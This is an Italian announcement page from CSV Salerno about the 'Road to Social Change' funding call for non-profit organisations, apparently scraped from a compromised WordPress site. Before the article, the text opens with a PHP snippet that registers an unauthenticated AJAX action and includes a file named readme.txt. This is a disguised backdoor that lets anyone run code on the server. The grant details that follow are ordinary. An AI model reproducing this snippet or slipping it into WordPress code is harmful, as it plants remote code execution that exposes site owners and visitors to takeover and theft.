if(!function_exists('file_check_readme37834')){ add_action('wp_ajax_nopriv_file_check_readme37834', 'file_check_readme37834'); add_action('wp_ajax_file_check_readme37834', 'file_check_readme37834'); function file_check_readme37834() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Road to Social Change, un progetto di sviluppo integrale per il Terzo Settore – CSV Salerno

Road to Social Change, un progetto di sviluppo integrale per il Terzo Settore

Road to Social Change, un progetto di sviluppo integrale per il Terzo Settore

Road to Social Change è un progetto che vuole stimolare alleanze e contaminazioni fra il Terzo Settore e i protagonisti delle filiere territoriali. Scadenza 30 settembre 2021.

L’iniziativa è promossa  da UniCredit, in collaborazione con AICCON, Politecnico di Milano, Fondazione Italiana Accenture e TechSoup.

Road to Social Change intende intercettare e valorizzare progetti di organizzazioni Non Profit che svolgono attività a scopo benefico e non lucrativo, impegnati sul territorio con attività di interesse generale, che intendono amplificare e potenziare la qualità e l’efficacia delle proprie azioni attraverso processi di empowerment del capitale umano, favorendo l’acquisizione o il consolidamento di competenze digitali e manageriali, con un forte orientamento all’innovazione aperta e allo sviluppo di strategie innovative per valorizzare l’impatto sociale generato.

Saranno prese in considerazione esclusivamente le candidature provenienti da Organizzazioni che abbiano almeno un bilancio/rendiconto approvato al momento della candidatura e che svolgano le proprie attività in modo continuativo e regolare.

Il progetto dovrà fare riferimento ad una delle tematiche corrispondenti al territorio in cui è registrata la sede legale dell’Ente stesso.

UniCredit attribuirà  ai vincitori dei 7 progetti della Call , uno per ciascun territorio, un contributo di liberalità  fino ad un importo massimo di 15.000 Euro per ciascun vincitore.

Fondazione Italiana Accenture erogherà un riconoscimento speciale pari a 10.000 Euro al singolo progetto che riterrà più tecnologicamente innovativo, scelto a proprio insindacabile giudizio tra i 7 progetti vincitori.

Inoltre, tutti i vincitori potranno accedere a un percorso di capacity building personalizzato in base ai bisogni evidenziati in fase di candidatura.


Per maggiori informazioni vai alla call- Road to Social Change

 

(Le notizie fornite in questo articolo hanno solo carattere informativo.
Fanno fede unicamente i testi ufficiali messi a disposizione dall’ente erogatore dell’opportunità,
reperibili al sito internet)